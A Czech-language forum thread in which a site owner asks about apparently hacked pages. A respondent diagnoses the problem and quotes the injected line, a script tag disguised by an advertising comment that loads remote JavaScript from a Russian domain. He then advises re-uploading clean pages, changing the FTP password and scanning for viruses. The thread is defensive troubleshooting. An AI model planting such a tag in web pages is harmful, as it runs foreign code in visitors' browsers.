hacknuté stránky?

Dobrý den, objevil se problém - při načítání stránek hedonis.xf.cz se podstránky sice načtou (některé ovšem ne správně), nicméně ve spodní liště probíhají informace typu připojuji se, přečteno, přenáším data a to vše doprovázeno adresami jakýchsi pofiderních a neznámých ruských či polských serverů. Další lidé mi hlásí, že jim při načítání stránek spadne celý IE nebo Firefox. Původně byl problém na indexu, ten jsem nahrál znovu a pak to zřejmě bylo v pořádku, ale problém je nyní na všech dalších podstránkách. Co z toho plyne? a) že stránky někdo napadl + b) že budu muset všechny podstránky nahrát znovu? Nebo je problém hlubší? Děkuji všem větším odborníkům než já za radu.
<!--WZ-REKLAMA-1.0IK--><script src=http://www.juc8.ru/script.js></script>

Odkaz na tento skript se tam mnohokrát opakuje. Možností je několik:
- někdo se dostal na tvé stránky (získal heslo) a dodal tam tento kód
- nebo máš infikovaný počítač a ten tento kód přidává na nahrávané stránky

Řešení: Předpokládám, že máš statické stránky, takže znovu tam nahrej VŠECHNY infikované stránky, bez tohoto kódu. Doporučuji používat FTP.
Skvělé, díky za pomoc.
Btw všechny podstránky mám zásadně dvakrát zálohované jinde a při kontrole jsem zjistil, že zde uvedený skript není. Z toho mi vyplývá, že se tam musel dostat při nahrávání na wz nebo přímo zde. Tudíž by to mohla být varianta 1, někdo hacknul heslo. Asi ho budu muset změnit...
<HTML>Heslo na ftp změnit určitě a pro jistotu taky zkontrolovat počítač (na přítomnost virů a jiné havěti).</HTML>